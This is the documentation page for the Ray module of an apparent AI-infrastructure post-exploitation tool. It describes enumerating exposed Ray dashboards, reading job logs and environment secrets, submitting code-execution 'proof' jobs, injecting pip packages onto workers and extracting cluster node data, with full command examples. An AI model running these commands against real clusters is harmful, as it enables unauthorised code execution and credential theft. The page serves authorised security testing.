Skip to content

Ray

Enumerate and exploit Ray dashboard and jobs API.

Overview

The ray module targets Ray cluster dashboards, covering metadata enumeration, job listing, log reads, artifact correlation, guarded proof-job submission, and runtime environment validation. It follows a jobs-to-takeover progression with proof-stage metadata on findings.

The jobs API client supports both JSON array responses (Ray 2.10+) and object-wrapped formats from older versions. The jobs command extracts runtime_env and env_vars from each job and emits critical-severity findings when credentials or secrets are found in job environment variables.

Subcommands

Read-Only (no --force-exploit required)

Subcommand Description
enum Dashboard metadata and version
jobs List visible jobs
job-logs Read job detail and logs
job-artifacts Extract artifact and log references from a job

Gated (requires --force-exploit)

Subcommand Description
submit Submit a proof job through the jobs API
runtime-env Validate runtime_env submission for a job
pip-inject Prove pip injection via runtime_env (arbitrary package install on cluster workers)
cluster-info Exfiltrate cluster resource and node information (IPs, CPU/GPU counts, alive status)

Flags

Flag Required Description
--target Yes Ray dashboard URL (e.g., http://127.0.0.1:8265)
--header No Custom HTTP headers. Repeatable.
--job-id For job-logs, job-artifacts, runtime-env Job ID to inspect
--entrypoint For submit Job entrypoint command
--runtime-env-json For submit Runtime environment JSON
--proof-preset For submit Proof preset name

Proof Presets

The submit command supports pre-built proof payloads:

Preset Description
env-disclosure Dump environment variables
env-marked Write a marker to environment
fs-survey Survey filesystem paths
runtime-survey Survey runtime environment
beacon Send a beacon request
python-print Simple Python print statement

Examples

# Enumerate dashboard
./aipostex ray --target http://127.0.0.1:8265 enum

# List jobs
./aipostex ray --target http://127.0.0.1:8265 jobs

# Read job logs
./aipostex ray --target http://127.0.0.1:8265 job-logs --job-id job-1

# Extract job artifacts
./aipostex ray --target http://127.0.0.1:8265 job-artifacts --job-id job-1

# Submit proof job (gated)
./aipostex ray --target http://127.0.0.1:8265 submit \
  --proof-preset env-disclosure --force-exploit

# Validate runtime-env (gated)
./aipostex ray --target http://127.0.0.1:8265 runtime-env \
  --job-id job-1 --force-exploit

# Prove pip injection via runtime_env (gated)
./aipostex ray --target http://127.0.0.1:8265 pip-inject --force-exploit

# Exfiltrate cluster resource info (gated)
./aipostex ray --target http://127.0.0.1:8265 cluster-info --force-exploit

Proof Stages

Ray findings carry proof-stage metadata:

Stage Example
reachable Dashboard responds
read-confirmed Job logs successfully read
execution-confirmed Proof job ran and produced output
takeover-capable Runtime environment allows arbitrary code
cluster-visible Cluster resources and node data extracted
pip-injectable Arbitrary pip packages installable on workers

Workflow Progression

discover network (discovers Ray on :8265)
  → ray enum (dashboard metadata)
    → ray jobs (list visible jobs)
      → ray job-logs --job-id <id> (read logs)
      → ray job-artifacts --job-id <id> (correlate artifacts)
        → ray submit --proof-preset <preset> (proof of execution, gated)
        → ray runtime-env --job-id <id> (validate takeover, gated)
        → ray pip-inject (prove pip injection, gated)
        → ray cluster-info (exfiltrate cluster resources, gated)